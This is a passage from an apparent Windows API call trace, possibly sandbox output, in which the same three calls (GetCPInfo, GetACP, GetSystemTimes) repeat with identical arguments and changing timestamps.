(in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.443] GetACP () returned 0x4e4 [0178.443] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.443] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.443] GetACP () returned 0x4e4 [0178.443] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.443] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.443] GetACP () returned 0x4e4 [0178.443] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.444] GetACP () returned 0x4e4 [0178.444] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.444] GetACP () returned 0x4e4 [0178.444] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.444] GetACP () returned 0x4e4 [0178.444] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.444] GetACP () returned 0x4e4 [0178.444] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.444] GetACP () returned 0x4e4 [0178.444] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.444] GetACP () returned 0x4e4 [0178.445] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.445] GetACP () returned 0x4e4 [0178.445] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.445] GetACP () returned 0x4e4 [0178.445] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.445] GetACP () returned 0x4e4 [0178.445] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.445] GetACP () returned 0x4e4 [0178.445] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.445] GetACP () returned 0x4e4 [0178.445] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.445] GetACP () returned 0x4e4 [0178.446] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.446] GetACP () returned 0x4e4 [0178.446] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.446] GetACP () returned 0x4e4 [0178.446] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.446] GetACP () returned 0x4e4 [0178.446] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.446] GetACP () returned 0x4e4 [0178.446] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.446] GetACP () returned 0x4e4 [0178.447] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.447] GetACP () returned 0x4e4 [0178.447] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.447] GetACP () returned 0x4e4 [0178.447] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.447] GetACP () returned 0x4e4 [0178.447] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.447] GetACP () returned 0x4e4 [0178.447] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.447] GetACP () returned 0x4e4 [0178.447] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.448] GetACP () returned 0x4e4 [0178.448] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.448] GetACP () returned 0x4e4 [0178.448] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.448] GetACP () returned 0x4e4 [0178.448] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.448] GetACP () returned 0x4e4 [0178.448] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.448] GetACP () returned 0x4e4 [0178.448] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.448] GetACP () returned 0x4e4 [0178.448] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.449] GetACP () returned 0x4e4 [0178.449] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.449] GetACP () returned 0x4e4 [0178.449] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.449] GetACP () returned 0x4e4 [0178.449] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.449] GetACP () returned 0x4e4 [0178.449] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.449] GetACP () returned 0x4e4 [0178.449] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.450] GetACP () returned 0x4e4 [0178.450] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.450] GetACP () returned 0x4e4 [0178.450] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.450] GetACP () returned 0x4e4 [0178.450] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.450] GetACP () returned 0x4e4 [0178.450] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.451] GetACP () returned 0x4e4 [0178.451] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.451] GetACP () returned 0x4e4 [0178.451] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.451] GetACP () returned 0x4e4 [0178.451] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.451] GetACP () returned 0x4e4 [0178.451] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.451] GetACP () returned 0x4e4 [0178.451] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.452] GetACP () returned 0x4e4 [0178.452] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.452] GetACP () returned 0x4e4 [0178.452] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.452] GetACP () returned 0x4e4 [0178.452] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.452] GetACP () returned 0x4e4 [0178.452] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.452] GetACP () returned 0x4e4 [0178.452] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.453] GetACP () returned 0x4e4 [0178.453] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.453] GetACP () returned 0x4e4 [0178.453] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.453] GetACP () returned 0x4e4 [0178.453] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.453] GetACP () returned 0x4e4 [0178.453] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.453] GetACP () returned 0x4e4 [0178.453] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.454] GetACP () returned 0x4e4 [0178.454] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.454] GetACP () returned 0x4e4 [0178.454] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.454] GetACP () returned 0x4e4 [0178.454] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.454] GetACP () returned 0x4e4 [0178.454] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.455] GetACP () returned 0x4e4 [0178.455] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.455] GetACP () returned 0x4e4 [0178.455] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.455] GetACP () returned 0x4e4 [0178.455] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.455] GetACP () returned 0x4e4 [0178.455] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.456] GetACP () returned 0x4e4 [0178.456] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.504] GetACP () returned 0x4e4 [0178.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.504] GetACP () returned 0x4e4 [0178.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.505] GetACP () returned 0x4e4 [0178.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.505] GetACP () returned 0x4e4 [0178.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.505] GetACP () returned 0x4e4 [0178.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.505] GetACP () returned 0x4e4 [0178.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.505] GetACP () returned 0x4e4 [0178.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.506] GetACP () returned 0x4e4 [0178.506] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.506] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.506] GetACP () returned 0x4e4 [0178.506] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.506] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.506] GetACP () returned 0x4e4 [0178.506] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.508] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.508] GetACP () returned 0x4e4 [0178.508] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.508] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.508] GetACP () returned 0x4e4 [0178.509] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.509] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.509] GetACP () returned 0x4e4 [0178.509] GetSystemTimes (in: lpIdleTime=0x18fa70, 